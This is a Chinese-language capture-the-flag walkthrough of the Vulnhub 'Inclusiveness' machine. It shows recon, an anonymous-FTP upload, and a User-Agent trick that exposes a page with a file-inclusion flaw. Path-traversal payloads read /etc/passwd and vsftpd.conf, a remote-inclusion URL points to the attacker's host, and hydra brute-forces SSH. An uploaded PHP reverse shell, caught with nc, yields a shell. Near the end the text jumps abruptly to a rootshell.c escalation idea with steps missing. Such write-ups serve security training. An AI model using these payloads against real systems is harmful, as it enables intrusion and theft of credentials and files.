Vulnhub之Inclusiveness靶机详细测试过程

Inclusiveness

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:44:49:32      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.111  08:00:27:51:1a:1d      1      60  PCS Systemtechnik GmbH   

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111

NMAP扫描

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.111 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-18 21:55 EDT
Nmap scan report for bogon (192.168.56.111)
Host is up (0.000099s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:51:1A:1D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.29 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ ftp 192.168.56.111 
Connected to 192.168.56.111.
220 (vsFTPd 3.0.3)
Name (192.168.56.111:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||37352|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Feb 08  2020 .
drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40199|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Feb 08  2020 .
drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
226 Directory send OK.
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||43004|)
150 Ok to send data.
100% |****************************************************************************************************************|    12      229.77 KiB/s    00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (14.98 KiB/s)
ftp> pwd
Remote directory: /pub
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||30574|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 19 11:57 pub
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> 

对FTP服务的信息收集结果如下:

  1. 目标主机允许匿名访问

  2. 匿名用户允许上传文件

  3. 匿名用户无法变换目录

  4. FTP服务版本没有漏洞可利用

──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/robots.txt           
You are not a search engine! You can't read my robots.txt!

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/robots.txt           
You are not a search engine! You can't read my robots.txt!
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ nikto -h http://192.168.56.111      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.111
+ Target Hostname:    192.168.56.111
+ Target Port:        80
+ Start Time:         2023-04-18 22:01:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 59e071e146cc0, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-04-18 22:02:57 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

接下来做一下目录扫描:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ gobuster dir -u http://192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js      
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              js,php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/04/18 22:04:22 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/.php                 (Status: 403) [Size: 279]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.111/manual/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.111/javascript/]
/robots.txt           (Status: 200) [Size: 59]
/seo.html             (Status: 200) [Size: 59]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/norobots.txt         (Status: 200) [Size: 59]
/robots-txt           (Status: 200) [Size: 59]
/robots-txt.html      (Status: 200) [Size: 59]
/robots-txt.txt       (Status: 200) [Size: 59]
/robots-txt.sh        (Status: 200) [Size: 59]
/robots-txt.php       (Status: 200) [Size: 59]
/robots-txt.js        (Status: 200) [Size: 59]
/server-status        (Status: 403) [Size: 279]
/valid-robots.txt     (Status: 200) [Size: 59]
Progress: 1321170 / 1323366 (99.83%)
===============================================================
2023/04/18 22:09:48 Finished

发现了很多robots.txt等文件,但是访问这些文件,返回的内容均为:You are not a search engine! You can't read my robots.txt!

但即使用Burpsuite拦截请求,修改User Agent为搜索引擎的UA:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

得到的返回内容是一样的

但是其实这个方向是对的,可能修改后的User Agent不能有其他信息,否则后台在做匹配的时候匹配不上,将User-agetn改为Googlebot

发现了目录/secret_information,经过测试,如果在Googlebot字符串另外增加任意字符都可能导致无法得到正确结果,但是其实之前的googlebot的UA是真正的谷歌爬虫用的UA,也许这是渗透测试而已。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the master for a copy of the records for that zone.

A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a copy of the zone records. And it sends you them; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address, and so servers trusted each other implicitly.

It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful.

So best practice is to restrict Zone transfers. At the bare minimum, you tell the master what the IP addresses of the slaves are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try and get round these controls.


secret_information页面有链接,从URL看可能存在本地文件包含漏洞

http://192.168.56.111/secret_information/?lang=en.php
──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/?lang=../../../../../etc/passwd
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi-autoipd:x:107:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:114:121::/var/lib/saned:/usr/sbin/nologin
colord:x:115:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:116:123::/var/lib/geoclue:/usr/sbin/nologin
tom:x:1000:1000:Tom,,,:/home/tom:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:118:125:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin


目标主机确实存在本地文件包含漏洞,接下来就看如何利用本地文件包含漏洞得到Shell

并且识别出用户名:tom

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/?lang=../../../../../home/tom/.ssh/id_rsa
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

没有发现tom用户的ssh私钥文件。

接下来看是否存在远程文件包含漏洞

http://192.168.56.111/secret_information/?lang=http://192.168.56.230:8000/test.txt

经过测试,目标主机并不存在远程文件包含漏洞。

看下是否可以暴力破解出tom的密码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ hydra -l tom -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.111                                                                                 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-18 22:48:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[STATUS] 141.00 tries/min, 141 tries in 00:01h, 14344260 to do in 1695:33h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

并没有破解出ssh的密码,也没有破解出ftp的密码。

接下来将php rerverse代码通过ftp上传至目标主机,但是关键问题是找到该文件的绝对路径,然后通过本地文件包含漏洞得到shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ ftp 192.168.56.111 
Connected to 192.168.56.111.
220 (vsFTPd 3.0.3)
Name (192.168.56.111:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||5748|)
553 Could not create file.
ftp> cd pub
250 Directory successfully changed.
ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||13252|)
150 Ok to send data.
100% |****************************************************************************************************************|  5496       43.31 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (6.80 MiB/s)
ftp> quit
221 Goodbye.

找到shell.php的绝对路径需要首先查看vsftpd的配置配置文件(前面nmap扫描已经知道ftp服务为vsftpd)

经过查询一般来说vsftpd的配置文件位置:/etc/vsftpd/vsftpd.conf

但是访问该位置,并没有得到相应的返回:

http://192.168.56.111/secret_information/?lang=../../../../etc/vsftpd/vsftpd.conf

把中间的这级目录去掉,再次访问

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/?lang=../../../../etc/vsftpd.conf
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.

anon_umask=000

listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in  your  local  time  zone.  The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories.  See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty.  Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO

#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
#
# Point users at the directory we created earlier.
anon_root=/var/ftp/
write_enable=YES

读取到vsftpd.conf文件内容,可知对于匿名用户的目录为/var/ftp,然后加上pub,即可访问到我们上传的shell.php

http://192.168.56.111/secret_information/?lang=../../../../var/ftp/pub/shell.php
──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.111] 41434
Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
 13:17:25 up  1:29,  0 users,  load average: 0.00, 0.05, 0.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@inclusiveness:/$ cd /home
cd /home
www-data@inclusiveness:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Feb  8  2020 .
drwxr-xr-x 19 root root 4.0K Feb  8  2020 ..
drwxr-xr-x 15 tom  tom  4.0K Feb  8  2020 tom

读了一下rootshell.c的内容,发现它是通过whoami这个命令来获取当前用户名的,我们可以生成我们自己的whoami,但是这个whomai返回是tom,这样rootshell得到的用户名就是tom


热门相关:斗神战帝   网游之逆天飞扬   霸皇纪   刺客之王   情生意动